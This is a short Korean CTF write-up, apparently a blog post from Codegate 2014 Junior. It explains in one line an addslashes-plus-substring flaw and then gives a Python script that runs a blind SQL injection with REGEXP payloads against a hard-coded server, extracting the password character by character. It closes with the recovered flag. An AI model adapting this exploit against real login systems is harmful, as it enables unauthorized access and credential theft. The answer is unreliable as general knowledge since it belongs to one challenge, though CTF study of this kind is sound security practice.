본문
addslash 이후 substring 시 나타날 수 있는 취약점 + REGEXP를 활용한 blind sql injection.
#!/usr/bin/python # http://58.229.183.25/eaf1c3a149e8c0dc599159c174655c2b/index.php?id=012345678901234567890123456789012345678\&pw=or(id+REGEXP+0x5E41)--+ import httplib, urllib import time def print_hex1(instr): convstr = "0x"; for ch in instr: convstr += (hex(ord(ch))[2:4]) return convstr def print_dec1(instr): convstr = "char("; for i,ch in enumerate(instr): convstr += "%d" % ord(ch); if (len(instr)-1 != i) : convstr += ", "; convstr += ')'; return convstr headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain" } found = "^00c58a5ba17dafc6a67c88a88cff4f98" for idx in range(1,44) : #for i in "abcdef1234567890" : for i in '''qazwsxedcrfvtgbyhnujmikolpQAZWSXEDCRFVTGBYHNUJMIKOLP0123456789~!@#$%^&*()_+}{|":<>?/.,;'[]\=-`''' : #blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1("^"+found+i)) blind = "id=012345678901234567890123456789012345678\&pw=or(pw+REGEXP+%s)--+" % (print_hex1(found[-4:]+i)) params = "" #print found #print found[-4:] #time.sleep(1) #params = urllib.urlencode({"pw":"", "id":"", "no":blind}) conn = httplib.HTTPConnection("58.229.183.25") #conn.set_debuglevel(10) print blind rq = "/eaf1c3a149e8c0dc599159c174655c2b/index.php?%s" % blind #print rq b = time.time() conn.request("GET", rq, params, headers) response = conn.getresponse() print response.status, response.reason #print rq data = response.read() #print data if data.find("Wrong") > 0 : found += i print found conn.close() break conn.close() print idx, found time.sleep(1) print found # 5e7a6f6d626965242424 = ^zombie$$$ # 5e303063353861356261 = ^00c58a5ba # password is ChA1N3D_EXPLOIT_IS_EVERYWHERE
'WarGame' 카테고리의 다른 글
[suninatas] Cipher III : Frequency analysis (0) | 2014.02.13 |
---|---|
[Codegate 2014 Junior CTF] review.. (0) | 2014.02.12 |
[Codegate 2014 Junior CTF] lottery 200 Point MISC (0) | 2014.02.12 |
[Codegate 2014 Junior CTF] Nuclear Launch (0) | 2014.02.12 |
[wargame.kr] regex!? write up. 정규표현식!. (0) | 2014.01.23 |